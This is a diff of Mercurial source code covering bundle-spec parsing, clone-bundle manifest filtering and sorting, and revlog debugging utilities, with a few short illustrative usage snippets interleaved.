293 295 version = b'v2'
294 296 elif requirementsmod.REVLOGV2_REQUIREMENT in repo.requirements:
295 297 version = b'v2'
296 298 # Modern compression engines require v2.
297 299 if compression not in _bundlespecv1compengines:
298 300 version = b'v2'
299 301 elif spec in _bundlespeccontentopts:
300 302 if spec == b'packed1':
301 303 compression = b'none'
302 304 else:
303 305 compression = b'bzip2'
304 306 version = spec
305 307 else:
306 308 raise error.UnsupportedBundleSpecification(
307 309 _(b'%s is not a recognized bundle specification') % spec
308 310 )
309 311
310 312 # Bundle version 1 only supports a known set of compression engines.
311 313 if version == b'v1' and compression not in _bundlespecv1compengines:
312 314 raise error.UnsupportedBundleSpecification(
313 315 _(b'compression engine %s is not supported on v1 bundles')
314 316 % compression
315 317 )
316 318
317 319 # The specification for packed1 can optionally declare the data formats
318 320 # required to apply it. If we see this metadata, compare against what the
319 321 # repo supports and error if the bundle isn't compatible.
320 322 if version == b'packed1' and b'requirements' in params:
321 323 requirements = set(cast(bytes, params[b'requirements']).split(b','))
322 324 missingreqs = requirements - requirementsmod.STREAM_FIXED_REQUIREMENTS
323 325 if missingreqs:
324 326 raise error.UnsupportedBundleSpecification(
325 327 _(b'missing support for repository features: %s')
326 328 % b', '.join(sorted(missingreqs))
327 329 )
328 330
329 331 # Compute contentopts based on the version
330 332 if b"stream" in params:
331 333 # This case is fishy as this mostly derails the version selection
332 334 # mechanism. `stream` bundles are quite specific and used differently
333 335 # as "normal" bundles.
334 336 #
335 337 # (we should probably define a cleaner way to do this and raise a
336 338 # warning when the old way is encountered)
337 339 if params[b"stream"] == b"v2":
338 340 version = b"streamv2"
339 341 if params[b"stream"] == b"v3-exp":
340 342 version = b"streamv3-exp"
341 343 contentopts = _bundlespeccontentopts.get(version, {}).copy()
342 344 if version == b"streamv2" or version == b"streamv3-exp":
343 345 # streamv2 has been reported as "v2" for a while.
344 346 version = b"v2"
345 347
346 348 engine = util.compengines.forbundlename(compression)
347 349 compression, wirecompression = engine.bundletype()
348 350 wireversion = _bundlespeccontentopts[version][b'cg.version']
349 351
350 352 return bundlespec(
351 353 compression, wirecompression, version, wireversion, params, contentopts
352 354 )
353 355
354 356
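# Illustrative usage sketch (not part of this change): parsing a spec of the
# documented <compression>-<type>;<params> form.
def _example_parse_spec(repo):
    # `repo` is assumed to be an already-loaded local repository object.
    spec = parsebundlespec(repo, b'gzip-v2;obsolescence=yes')
    assert spec.compression == b'gzip'
    assert spec.version == b'v2'
    assert spec.params[b'obsolescence'] is True  # coerced by param_bool()
    return spec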
355 357 def parseclonebundlesmanifest(repo, s):
356 358 """Parses the raw text of a clone bundles manifest.
357 359
358 360 Returns a list of dicts. The dicts have a ``URL`` key corresponding
359 361 to the URL and other keys are the attributes for the entry.
360 362 """
361 363 m = []
362 364 for line in s.splitlines():
363 365 fields = line.split()
364 366 if not fields:
365 367 continue
366 368 attrs = {b'URL': fields[0]}
367 369 for rawattr in fields[1:]:
368 370 key, value = rawattr.split(b'=', 1)
369 371 key = util.urlreq.unquote(key)
370 372 value = util.urlreq.unquote(value)
371 373 attrs[key] = value
372 374
373 375 # Parse BUNDLESPEC into components. This makes client-side
374 376 # preferences easier to specify since you can prefer a single
375 377 # component of the BUNDLESPEC.
376 378 if key == b'BUNDLESPEC':
377 379 try:
378 380 bundlespec = parsebundlespec(repo, value)
379 381 attrs[b'COMPRESSION'] = bundlespec.compression
380 382 attrs[b'VERSION'] = bundlespec.version
381 383 except error.InvalidBundleSpecification:
382 384 pass
383 385 except error.UnsupportedBundleSpecification:
384 386 pass
385 387
386 388 m.append(attrs)
387 389
388 390 return m
389 391
390 392
391 393 def isstreamclonespec(bundlespec):
392 394 # Stream clone v1
393 395 if bundlespec.wirecompression == b'UN' and bundlespec.wireversion == b's1':
394 396 return True
395 397
396 398 # Stream clone v2
397 399 if (
398 400 bundlespec.wirecompression == b'UN'
399 401 and bundlespec.wireversion == b'02'
400 402 and bundlespec.contentopts.get(b'stream', None) in (b"v2", b"v3-exp")
401 403 ):
402 404 return True
403 405
404 406 return False
405 407
406 408
407 409 def filterclonebundleentries(
408 410 repo, entries, streamclonerequested=False, pullbundles=False
409 411 ):
410 412 """Remove incompatible clone bundle manifest entries.
411 413
412 414 Accepts a list of entries parsed with ``parseclonebundlesmanifest``
413 415 and returns a new list consisting of only the entries that this client
414 416 should be able to apply.
415 417
416 418 There is no guarantee we'll be able to apply all returned entries because
417 419 the metadata we use to filter on may be missing or wrong.
418 420 """
419 421 newentries = []
420 422 for entry in entries:
421 423 url = entry.get(b'URL')
422 424 if not pullbundles and not any(
423 425 [url.startswith(scheme) for scheme in SUPPORTED_CLONEBUNDLE_SCHEMES]
424 426 ):
425 427 repo.ui.debug(
426 428 b'filtering %s because not a supported clonebundle scheme\n'
427 429 % url
428 430 )
429 431 continue
430 432
431 433 spec = entry.get(b'BUNDLESPEC')
432 434 if spec:
433 435 try:
434 436 bundlespec = parsebundlespec(repo, spec, strict=True)
435 437
436 438 # If a stream clone was requested, filter out non-streamclone
437 439 # entries.
438 440 if streamclonerequested and not isstreamclonespec(bundlespec):
439 441 repo.ui.debug(
440 442 b'filtering %s because not a stream clone\n' % url
441 443 )
442 444 continue
443 445
444 446 except error.InvalidBundleSpecification as e:
445 447 repo.ui.debug(stringutil.forcebytestr(e) + b'\n')
446 448 continue
447 449 except error.UnsupportedBundleSpecification as e:
448 450 repo.ui.debug(
449 451 b'filtering %s because unsupported bundle '
450 452 b'spec: %s\n' % (url, stringutil.forcebytestr(e))
451 453 )
452 454 continue
453 455 # If we don't have a spec and requested a stream clone, we don't know
454 456 # what the entry is so don't attempt to apply it.
455 457 elif streamclonerequested:
456 458 repo.ui.debug(
457 459 b'filtering %s because cannot determine if a stream '
458 460 b'clone bundle\n' % url
459 461 )
460 462 continue
461 463
462 464 if b'REQUIRESNI' in entry and not sslutil.hassni:
463 465 repo.ui.debug(b'filtering %s because SNI not supported\n' % url)
464 466 continue
465 467
466 468 if b'REQUIREDRAM' in entry:
467 469 try:
468 470 requiredram = util.sizetoint(entry[b'REQUIREDRAM'])
469 471 except error.ParseError:
470 472 repo.ui.debug(
471 473 b'filtering %s due to a bad REQUIREDRAM attribute\n' % url
472 474 )
473 475 continue
474 476 actualram = repo.ui.estimatememory()
475 477 if actualram is not None and actualram * 0.66 < requiredram:
476 478 repo.ui.debug(
477 479 b'filtering %s as it needs more than 2/3 of system memory\n'
478 480 % url
479 481 )
480 482 continue
481 483
482 484 newentries.append(entry)
483 485
484 486 return newentries
485 487
486 488
487 489 class clonebundleentry:
488 490 """Represents an item in a clone bundles manifest.
489 491
490 492 This rich class is needed to support sorting since sorted() in Python 3
491 493 doesn't support ``cmp`` and our comparison is complex enough that ``key=``
492 494 won't work.
493 495 """
494 496
495 497 def __init__(self, value, prefers):
496 498 self.value = value
497 499 self.prefers = prefers
498 500
499 501 def _cmp(self, other):
500 502 for prefkey, prefvalue in self.prefers:
501 503 avalue = self.value.get(prefkey)
502 504 bvalue = other.value.get(prefkey)
503 505
504 506 # Special case for b missing attribute and a matches exactly.
505 507 if avalue is not None and bvalue is None and avalue == prefvalue:
506 508 return -1
507 509
508 510 # Special case for a missing attribute and b matches exactly.
509 511 if bvalue is not None and avalue is None and bvalue == prefvalue:
510 512 return 1
511 513
512 514 # We can't compare unless attribute present on both.
513 515 if avalue is None or bvalue is None:
514 516 continue
515 517
516 518 # Same values should fall back to next attribute.
517 519 if avalue == bvalue:
518 520 continue
519 521
520 522 # Exact matches come first.
521 523 if avalue == prefvalue:
522 524 return -1
523 525 if bvalue == prefvalue:
524 526 return 1
525 527
526 528 # Fall back to next attribute.
527 529 continue
528 530
529 531 # If we got here we couldn't sort by attributes and prefers. Fall
530 532 # back to index order.
531 533 return 0
532 534
533 535 def __lt__(self, other):
534 536 return self._cmp(other) < 0
535 537
536 538 def __gt__(self, other):
537 539 return self._cmp(other) > 0
538 540
539 541 def __eq__(self, other):
540 542 return self._cmp(other) == 0
541 543
542 544 def __le__(self, other):
543 545 return self._cmp(other) <= 0
544 546
545 547 def __ge__(self, other):
546 548 return self._cmp(other) >= 0
547 549
548 550 def __ne__(self, other):
549 551 return self._cmp(other) != 0
550 552
551 553
552 554 def sortclonebundleentries(ui, entries):
553 555 prefers = ui.configlist(b'ui', b'clonebundleprefers')
554 556 if not prefers:
555 557 return list(entries)
556 558
557 559 def _split(p):
558 560 if b'=' not in p:
559 561 hint = _(b"each comma separated item should be key=value pairs")
560 562 raise error.Abort(
561 563 _(b"invalid ui.clonebundleprefers item: %s") % p, hint=hint
562 564 )
563 565 return p.split(b'=', 1)
564 566
565 567 prefers = [_split(p) for p in prefers]
566 568
567 569 items = sorted(clonebundleentry(v, prefers) for v in entries)
568 570 return [i.value for i in items]
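Putting the helpers above together, a hedged client-side sketch (the manifest text, URLs and sizes are hypothetical):

manifest = (
    b'https://cdn.example.org/full.hg BUNDLESPEC=zstd-v2 REQUIREDRAM=2GB\n'
    b'https://cdn.example.org/stream.hg BUNDLESPEC=none-packed1\n'
)
entries = parseclonebundlesmanifest(repo, manifest)
entries = filterclonebundleentries(repo, entries)
# ordering honours e.g. `ui.clonebundleprefers = COMPRESSION=zstd`
entries = sortclonebundleentries(repo.ui, entries)
best_url = entries[0][b'URL'] if entries else None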
@@ -1,38 +1,40 @@
1 from __future__ import annotations
2
1 3 from ..i18n import _
2 4 from .. import error
3 5
4 6
5 7 def get_checker(ui, revlog_name=b'changelog'):
6 8 """Get a function that checks file handle position is as expected.
7 9
8 10 This is used to ensure that files haven't been modified outside of our
9 11 knowledge (such as on a networked filesystem, if `hg debuglocks` was used,
10 12 or if writes to .hg happened that ignored locks).
11 13
12 14 Due to revlogs supporting a concept of buffered, delayed, or diverted
13 15 writes, we're allowing the files to be shorter than expected (the data may
14 16 not have been written yet), but they can't be longer.
15 17
16 18 Please note that this check is not perfect; it can't detect all cases (there
17 19 may be false-negatives/false-OKs), but it should never claim there's an
18 20 issue when there isn't (false-positives/false-failures).
19 21 """
20 22
21 23 vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name)
22 24 # Avoid any `fh.tell` cost if this isn't enabled.
23 25 if not vpos or vpos not in [b'log', b'warn', b'fail']:
24 26 return None
25 27
26 28 def _checker(fh, fn, expected):
27 29 if fh.tell() <= expected:
28 30 return
29 31
30 32 msg = _(b'%s: file cursor at position %d, expected %d')
31 33 # Always log if we're going to warn or fail.
32 34 ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected)
33 35 if vpos == b'warn':
34 36 ui.warn((msg + b'\n') % (fn, fh.tell(), expected))
35 37 elif vpos == b'fail':
36 38 raise error.RevlogError(msg % (fn, fh.tell(), expected))
37 39
38 40 return _checker
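A hedged sketch of how revlog code is expected to use this helper; the config section is real, but the file handle, file name and offset below are placeholders:

# hgrc needed for the checker to be returned at all:
#   [debug]
#   revlog.verifyposition.changelog = warn   # or: log, fail
checker = get_checker(ui, revlog_name=b'changelog')
if checker is not None:
    checker(fh, b'00changelog.i', expected_offset)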
@@ -1,943 +1,945 @@
1 1 # revlogutils/debug.py - utility used for revlog debugging
2 2 #
3 3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 4 # Copyright 2022 Octobus <contact@octobus.net>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 from __future__ import annotations
10
9 11 import collections
10 12 import string
11 13
12 14 from .. import (
13 15 mdiff,
14 16 node as nodemod,
15 17 revlogutils,
16 18 )
17 19
18 20 from . import (
19 21 constants,
20 22 deltas as deltautil,
21 23 )
22 24
23 25 INDEX_ENTRY_DEBUG_COLUMN = []
24 26
25 27 NODE_SIZE = object()
26 28
27 29
28 30 class _column_base:
29 31 """constains the definition of a revlog column
30 32
31 33 name: the column header,
32 34 value_func: the function called to get a value,
33 35 size: the width of the column,
34 36 verbose_only: only include the column in verbose mode.
35 37 """
36 38
37 39 def __init__(self, name, value_func, size=None, verbose=False):
38 40 self.name = name
39 41 self.value_func = value_func
40 42 if size is not NODE_SIZE:
41 43 if size is None:
42 44 size = 8 # arbitrary default
43 45 size = max(len(name), size)
44 46 self._size = size
45 47 self.verbose_only = verbose
46 48
47 49 def get_size(self, node_size):
48 50 if self._size is NODE_SIZE:
49 51 return node_size
50 52 else:
51 53 return self._size
52 54
53 55
54 56 def debug_column(name, size=None, verbose=False):
55 57 """decorated function is registered as a column
56 58
57 59 name: the name of the column,
58 60 size: the expected size of the column.
59 61 """
60 62
61 63 def register(func):
62 64 entry = _column_base(
63 65 name=name,
64 66 value_func=func,
65 67 size=size,
66 68 verbose=verbose,
67 69 )
68 70 INDEX_ENTRY_DEBUG_COLUMN.append(entry)
69 71 return entry
70 72
71 73 return register
72 74
73 75
74 76 @debug_column(b"rev", size=6)
75 77 def _rev(index, rev, entry, hexfn):
76 78 return b"%d" % rev
77 79
78 80
79 81 @debug_column(b"rank", size=6, verbose=True)
80 82 def rank(index, rev, entry, hexfn):
81 83 return b"%d" % entry[constants.ENTRY_RANK]
82 84
83 85
84 86 @debug_column(b"linkrev", size=6)
85 87 def _linkrev(index, rev, entry, hexfn):
86 88 return b"%d" % entry[constants.ENTRY_LINK_REV]
87 89
88 90
89 91 @debug_column(b"nodeid", size=NODE_SIZE)
90 92 def _nodeid(index, rev, entry, hexfn):
91 93 return hexfn(entry[constants.ENTRY_NODE_ID])
92 94
93 95
94 96 @debug_column(b"p1-rev", size=6, verbose=True)
95 97 def _p1_rev(index, rev, entry, hexfn):
96 98 return b"%d" % entry[constants.ENTRY_PARENT_1]
97 99
98 100
99 101 @debug_column(b"p1-nodeid", size=NODE_SIZE)
100 102 def _p1_node(index, rev, entry, hexfn):
101 103 parent = entry[constants.ENTRY_PARENT_1]
102 104 p_entry = index[parent]
103 105 return hexfn(p_entry[constants.ENTRY_NODE_ID])
104 106
105 107
106 108 @debug_column(b"p2-rev", size=6, verbose=True)
107 109 def _p2_rev(index, rev, entry, hexfn):
108 110 return b"%d" % entry[constants.ENTRY_PARENT_2]
109 111
110 112
111 113 @debug_column(b"p2-nodeid", size=NODE_SIZE)
112 114 def _p2_node(index, rev, entry, hexfn):
113 115 parent = entry[constants.ENTRY_PARENT_2]
114 116 p_entry = index[parent]
115 117 return hexfn(p_entry[constants.ENTRY_NODE_ID])
116 118
117 119
118 120 @debug_column(b"full-size", size=20, verbose=True)
119 121 def full_size(index, rev, entry, hexfn):
120 122 return b"%d" % entry[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH]
121 123
122 124
123 125 @debug_column(b"delta-base", size=6, verbose=True)
124 126 def delta_base(index, rev, entry, hexfn):
125 127 return b"%d" % entry[constants.ENTRY_DELTA_BASE]
126 128
127 129
128 130 @debug_column(b"flags", size=2, verbose=True)
129 131 def flags(index, rev, entry, hexfn):
130 132 field = entry[constants.ENTRY_DATA_OFFSET]
131 133 field &= 0xFFFF
132 134 return b"%d" % field
133 135
134 136
135 137 @debug_column(b"comp-mode", size=4, verbose=True)
136 138 def compression_mode(index, rev, entry, hexfn):
137 139 return b"%d" % entry[constants.ENTRY_DATA_COMPRESSION_MODE]
138 140
139 141
140 142 @debug_column(b"data-offset", size=20, verbose=True)
141 143 def data_offset(index, rev, entry, hexfn):
142 144 field = entry[constants.ENTRY_DATA_OFFSET]
143 145 field >>= 16
144 146 return b"%d" % field
145 147
146 148
147 149 @debug_column(b"chunk-size", size=10, verbose=True)
148 150 def data_chunk_size(index, rev, entry, hexfn):
149 151 return b"%d" % entry[constants.ENTRY_DATA_COMPRESSED_LENGTH]
150 152
151 153
152 154 @debug_column(b"sd-comp-mode", size=7, verbose=True)
153 155 def sidedata_compression_mode(index, rev, entry, hexfn):
154 156 compression = entry[constants.ENTRY_SIDEDATA_COMPRESSION_MODE]
155 157 if compression == constants.COMP_MODE_PLAIN:
156 158 return b"plain"
157 159 elif compression == constants.COMP_MODE_DEFAULT:
158 160 return b"default"
159 161 elif compression == constants.COMP_MODE_INLINE:
160 162 return b"inline"
161 163 else:
162 164 return b"%d" % compression
163 165
164 166
165 167 @debug_column(b"sidedata-offset", size=20, verbose=True)
166 168 def sidedata_offset(index, rev, entry, hexfn):
167 169 return b"%d" % entry[constants.ENTRY_SIDEDATA_OFFSET]
168 170
169 171
170 172 @debug_column(b"sd-chunk-size", size=10, verbose=True)
171 173 def sidedata_chunk_size(index, rev, entry, hexfn):
172 174 return b"%d" % entry[constants.ENTRY_SIDEDATA_COMPRESSED_LENGTH]
173 175
174 176
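# Illustrative only (not part of this change): an additional column would be
# registered with the same decorator and picked up automatically by
# debug_index() below. The name and width here are made up.
@debug_column(b"sd-end", size=20, verbose=True)
def _sidedata_end(index, rev, entry, hexfn):
    start = entry[constants.ENTRY_SIDEDATA_OFFSET]
    length = entry[constants.ENTRY_SIDEDATA_COMPRESSED_LENGTH]
    return b"%d" % (start + length)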
175 177 def debug_index(
176 178 ui,
177 179 repo,
178 180 formatter,
179 181 revlog,
180 182 full_node,
181 183 ):
182 184 """display index data for a revlog"""
183 185 if full_node:
184 186 hexfn = nodemod.hex
185 187 else:
186 188 hexfn = nodemod.short
187 189
188 190 idlen = 12
189 191 for i in revlog:
190 192 idlen = len(hexfn(revlog.node(i)))
191 193 break
192 194
193 195 fm = formatter
194 196
195 197 header_pieces = []
196 198 for column in INDEX_ENTRY_DEBUG_COLUMN:
197 199 if column.verbose_only and not ui.verbose:
198 200 continue
199 201 size = column.get_size(idlen)
200 202 name = column.name
201 203 header_pieces.append(name.rjust(size))
202 204
203 205 fm.plain(b' '.join(header_pieces) + b'\n')
204 206
205 207 index = revlog.index
206 208
207 209 for rev in revlog:
208 210 fm.startitem()
209 211 entry = index[rev]
210 212 first = True
211 213 for column in INDEX_ENTRY_DEBUG_COLUMN:
212 214 if column.verbose_only and not ui.verbose:
213 215 continue
214 216 if not first:
215 217 fm.plain(b' ')
216 218 first = False
217 219
218 220 size = column.get_size(idlen)
219 221 value = column.value_func(index, rev, entry, hexfn)
220 222 display = b"%%%ds" % size
221 223 fm.write(column.name, display, value)
222 224 fm.plain(b'\n')
223 225
224 226 fm.end()
225 227
226 228
227 229 def dump(ui, revlog):
228 230 """perform the work for `hg debugrevlog --dump"""
229 231 # XXX seems redundant with debug index ?
230 232 r = revlog
231 233 numrevs = len(r)
232 234 ui.write(
233 235 (
234 236 b"# rev p1rev p2rev start end deltastart base p1 p2"
235 237 b" rawsize totalsize compression heads chainlen\n"
236 238 )
237 239 )
238 240 ts = 0
239 241 heads = set()
240 242
241 243 for rev in range(numrevs):
242 244 dbase = r.deltaparent(rev)
243 245 if dbase == -1:
244 246 dbase = rev
245 247 cbase = r.chainbase(rev)
246 248 clen = r.chainlen(rev)
247 249 p1, p2 = r.parentrevs(rev)
248 250 rs = r.rawsize(rev)
249 251 ts = ts + rs
250 252 heads -= set(r.parentrevs(rev))
251 253 heads.add(rev)
252 254 try:
253 255 compression = ts / r.end(rev)
254 256 except ZeroDivisionError:
255 257 compression = 0
256 258 ui.write(
257 259 b"%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
258 260 b"%11d %5d %8d\n"
259 261 % (
260 262 rev,
261 263 p1,
262 264 p2,
263 265 r.start(rev),
264 266 r.end(rev),
265 267 r.start(dbase),
266 268 r.start(cbase),
267 269 r.start(p1),
268 270 r.start(p2),
269 271 rs,
270 272 ts,
271 273 compression,
272 274 len(heads),
273 275 clen,
274 276 )
275 277 )
276 278
277 279
278 280 def debug_revlog(ui, revlog):
279 281 """code for `hg debugrevlog`"""
280 282 r = revlog
281 283 format = r._format_version
282 284 v = r._format_flags
283 285 flags = []
284 286 gdelta = False
285 287 if v & constants.FLAG_INLINE_DATA:
286 288 flags.append(b'inline')
287 289 if v & constants.FLAG_GENERALDELTA:
288 290 gdelta = True
289 291 flags.append(b'generaldelta')
290 292 if not flags:
291 293 flags = [b'(none)']
292 294
293 295 ### the total size of stored content if uncompressed.
294 296 full_text_total_size = 0
295 297 ### tracks merge vs single parent
296 298 nummerges = 0
297 299
298 300 ### tracks the ways the deltas are built
299 301 # nodelta
300 302 numempty = 0
301 303 numemptytext = 0
302 304 numemptydelta = 0
303 305 # full file content
304 306 numfull = 0
305 307 # intermediate snapshot against a prior snapshot
306 308 numsemi = 0
307 309 # snapshot count per depth
308 310 numsnapdepth = collections.defaultdict(lambda: 0)
309 311 # number of snapshots with a non-ancestor delta
310 312 numsnapdepth_nad = collections.defaultdict(lambda: 0)
311 313 # delta against previous revision
312 314 numprev = 0
313 315 # delta against prev, where prev is a non-ancestor
314 316 numprev_nad = 0
315 317 # delta against first or second parent (not prev)
316 318 nump1 = 0
317 319 nump2 = 0
318 320 # delta against neither prev nor parents
319 321 numother = 0
320 322 # delta against other that is a non-ancestor
321 323 numother_nad = 0
322 324 # delta against prev that are also first or second parent
323 325 # (details of `numprev`)
324 326 nump1prev = 0
325 327 nump2prev = 0
326 328
327 329 # data about delta chain of each revs
328 330 chainlengths = []
329 331 chainbases = []
330 332 chainspans = []
331 333
332 334 # data about each revision
333 335 datasize = [None, 0, 0]
334 336 fullsize = [None, 0, 0]
335 337 semisize = [None, 0, 0]
336 338 # snapshot count per depth
337 339 snapsizedepth = collections.defaultdict(lambda: [None, 0, 0])
338 340 deltasize = [None, 0, 0]
339 341 chunktypecounts = {}
340 342 chunktypesizes = {}
341 343
342 344 def addsize(size, l):
343 345 if l[0] is None or size < l[0]:
344 346 l[0] = size
345 347 if size > l[1]:
346 348 l[1] = size
347 349 l[2] += size
348 350
349 351 with r.reading():
350 352 numrevs = len(r)
351 353 for rev in range(numrevs):
352 354 p1, p2 = r.parentrevs(rev)
353 355 delta = r.deltaparent(rev)
354 356 if format > 0:
355 357 s = r.rawsize(rev)
356 358 full_text_total_size += s
357 359 addsize(s, datasize)
358 360 if p2 != nodemod.nullrev:
359 361 nummerges += 1
360 362 size = r.length(rev)
361 363 if delta == nodemod.nullrev:
362 364 chainlengths.append(0)
363 365 chainbases.append(r.start(rev))
364 366 chainspans.append(size)
365 367 if size == 0:
366 368 numempty += 1
367 369 numemptytext += 1
368 370 else:
369 371 numfull += 1
370 372 numsnapdepth[0] += 1
371 373 addsize(size, fullsize)
372 374 addsize(size, snapsizedepth[0])
373 375 else:
374 376 nad = (
375 377 delta != p1
376 378 and delta != p2
377 379 and not r.isancestorrev(delta, rev)
378 380 )
379 381 chainlengths.append(chainlengths[delta] + 1)
380 382 baseaddr = chainbases[delta]
381 383 revaddr = r.start(rev)
382 384 chainbases.append(baseaddr)
383 385 chainspans.append((revaddr - baseaddr) + size)
384 386 if size == 0:
385 387 numempty += 1
386 388 numemptydelta += 1
387 389 elif r.issnapshot(rev):
388 390 addsize(size, semisize)
389 391 numsemi += 1
390 392 depth = r.snapshotdepth(rev)
391 393 numsnapdepth[depth] += 1
392 394 if nad:
393 395 numsnapdepth_nad[depth] += 1
394 396 addsize(size, snapsizedepth[depth])
395 397 else:
396 398 addsize(size, deltasize)
397 399 if delta == rev - 1:
398 400 numprev += 1
399 401 if delta == p1:
400 402 nump1prev += 1
401 403 elif delta == p2:
402 404 nump2prev += 1
403 405 elif nad:
404 406 numprev_nad += 1
405 407 elif delta == p1:
406 408 nump1 += 1
407 409 elif delta == p2:
408 410 nump2 += 1
409 411 elif delta != nodemod.nullrev:
410 412 numother += 1
411 413 numother_nad += 1
412 414
413 415 # Obtain data on the raw chunks in the revlog.
414 416 if hasattr(r, '_inner'):
415 417 segment = r._inner.get_segment_for_revs(rev, rev)[1]
416 418 else:
417 419 segment = r._revlog._getsegmentforrevs(rev, rev)[1]
418 420 if segment:
419 421 chunktype = bytes(segment[0:1])
420 422 else:
421 423 chunktype = b'empty'
422 424
423 425 if chunktype not in chunktypecounts:
424 426 chunktypecounts[chunktype] = 0
425 427 chunktypesizes[chunktype] = 0
426 428
427 429 chunktypecounts[chunktype] += 1
428 430 chunktypesizes[chunktype] += size
429 431
430 432 # Adjust size min value for empty cases
431 433 for size in (datasize, fullsize, semisize, deltasize):
432 434 if size[0] is None:
433 435 size[0] = 0
434 436
435 437 numdeltas = numrevs - numfull - numempty - numsemi
436 438 numoprev = numprev - nump1prev - nump2prev - numprev_nad
437 439 num_other_ancestors = numother - numother_nad
438 440 totalrawsize = datasize[2]
439 441 datasize[2] /= numrevs
440 442 fulltotal = fullsize[2]
441 443 if numfull == 0:
442 444 fullsize[2] = 0
443 445 else:
444 446 fullsize[2] /= numfull
445 447 semitotal = semisize[2]
446 448 snaptotal = {}
447 449 if numsemi > 0:
448 450 semisize[2] /= numsemi
449 451 for depth in snapsizedepth:
450 452 snaptotal[depth] = snapsizedepth[depth][2]
451 453 snapsizedepth[depth][2] /= numsnapdepth[depth]
452 454
453 455 deltatotal = deltasize[2]
454 456 if numdeltas > 0:
455 457 deltasize[2] /= numdeltas
456 458 totalsize = fulltotal + semitotal + deltatotal
457 459 avgchainlen = sum(chainlengths) / numrevs
458 460 maxchainlen = max(chainlengths)
459 461 maxchainspan = max(chainspans)
460 462 compratio = 1
461 463 if totalsize:
462 464 compratio = totalrawsize / totalsize
463 465
464 466 basedfmtstr = b'%%%dd\n'
465 467 basepcfmtstr = b'%%%dd %s(%%5.2f%%%%)\n'
466 468
467 469 def dfmtstr(max):
468 470 return basedfmtstr % len(str(max))
469 471
470 472 def pcfmtstr(max, padding=0):
471 473 return basepcfmtstr % (len(str(max)), b' ' * padding)
472 474
473 475 def pcfmt(value, total):
474 476 if total:
475 477 return (value, 100 * float(value) / total)
476 478 else:
477 479 return value, 100.0
478 480
479 481 ui.writenoi18n(b'format : %d\n' % format)
480 482 ui.writenoi18n(b'flags : %s\n' % b', '.join(flags))
481 483
482 484 ui.write(b'\n')
483 485 fmt = pcfmtstr(totalsize)
484 486 fmt2 = dfmtstr(totalsize)
485 487 ui.writenoi18n(b'revisions : ' + fmt2 % numrevs)
486 488 ui.writenoi18n(b' merges : ' + fmt % pcfmt(nummerges, numrevs))
487 489 ui.writenoi18n(
488 490 b' normal : ' + fmt % pcfmt(numrevs - nummerges, numrevs)
489 491 )
490 492 ui.writenoi18n(b'revisions : ' + fmt2 % numrevs)
491 493 ui.writenoi18n(b' empty : ' + fmt % pcfmt(numempty, numrevs))
492 494 ui.writenoi18n(
493 495 b' text : '
494 496 + fmt % pcfmt(numemptytext, numemptytext + numemptydelta)
495 497 )
496 498 ui.writenoi18n(
497 499 b' delta : '
498 500 + fmt % pcfmt(numemptydelta, numemptytext + numemptydelta)
499 501 )
500 502 ui.writenoi18n(
501 503 b' snapshot : ' + fmt % pcfmt(numfull + numsemi, numrevs)
502 504 )
503 505 for depth in sorted(numsnapdepth):
504 506 base = b' lvl-%-3d : ' % depth
505 507 count = fmt % pcfmt(numsnapdepth[depth], numrevs)
506 508 pieces = [base, count]
507 509 if numsnapdepth_nad[depth]:
508 510 pieces[-1] = count = count[:-1] # drop the final '\n'
509 511 more = b' non-ancestor-bases: '
510 512 anc_count = fmt
511 513 anc_count %= pcfmt(numsnapdepth_nad[depth], numsnapdepth[depth])
512 514 pieces.append(more)
513 515 pieces.append(anc_count)
514 516 ui.write(b''.join(pieces))
515 517 ui.writenoi18n(b' deltas : ' + fmt % pcfmt(numdeltas, numrevs))
516 518 ui.writenoi18n(b'revision size : ' + fmt2 % totalsize)
517 519 ui.writenoi18n(
518 520 b' snapshot : ' + fmt % pcfmt(fulltotal + semitotal, totalsize)
519 521 )
520 522 for depth in sorted(numsnapdepth):
521 523 ui.write(
522 524 (b' lvl-%-3d : ' % depth)
523 525 + fmt % pcfmt(snaptotal[depth], totalsize)
524 526 )
525 527 ui.writenoi18n(b' deltas : ' + fmt % pcfmt(deltatotal, totalsize))
526 528
527 529 letters = string.ascii_letters.encode('ascii')
528 530
529 531 def fmtchunktype(chunktype):
530 532 if chunktype == b'empty':
531 533 return b' %s : ' % chunktype
532 534 elif chunktype in letters:
533 535 return b' 0x%s (%s) : ' % (nodemod.hex(chunktype), chunktype)
534 536 else:
535 537 return b' 0x%s : ' % nodemod.hex(chunktype)
536 538
537 539 ui.write(b'\n')
538 540 ui.writenoi18n(b'chunks : ' + fmt2 % numrevs)
539 541 for chunktype in sorted(chunktypecounts):
540 542 ui.write(fmtchunktype(chunktype))
541 543 ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
542 544 ui.writenoi18n(b'chunks size : ' + fmt2 % totalsize)
543 545 for chunktype in sorted(chunktypecounts):
544 546 ui.write(fmtchunktype(chunktype))
545 547 ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
546 548
547 549 ui.write(b'\n')
548 550 b_total = b"%d" % full_text_total_size
549 551 p_total = []
550 552 while len(b_total) > 3:
551 553 p_total.append(b_total[-3:])
552 554 b_total = b_total[:-3]
553 555 p_total.append(b_total)
554 556 p_total.reverse()
555 557 b_total = b' '.join(p_total)
556 558
557 559 ui.write(b'\n')
558 560 ui.writenoi18n(b'total-stored-content: %s bytes\n' % b_total)
559 561 ui.write(b'\n')
560 562 fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
561 563 ui.writenoi18n(b'avg chain length : ' + fmt % avgchainlen)
562 564 ui.writenoi18n(b'max chain length : ' + fmt % maxchainlen)
563 565 ui.writenoi18n(b'max chain reach : ' + fmt % maxchainspan)
564 566 ui.writenoi18n(b'compression ratio : ' + fmt % compratio)
565 567
566 568 if format > 0:
567 569 ui.write(b'\n')
568 570 ui.writenoi18n(
569 571 b'uncompressed data size (min/max/avg) : %d / %d / %d\n'
570 572 % tuple(datasize)
571 573 )
572 574 ui.writenoi18n(
573 575 b'full revision size (min/max/avg) : %d / %d / %d\n'
574 576 % tuple(fullsize)
575 577 )
576 578 ui.writenoi18n(
577 579 b'inter-snapshot size (min/max/avg) : %d / %d / %d\n'
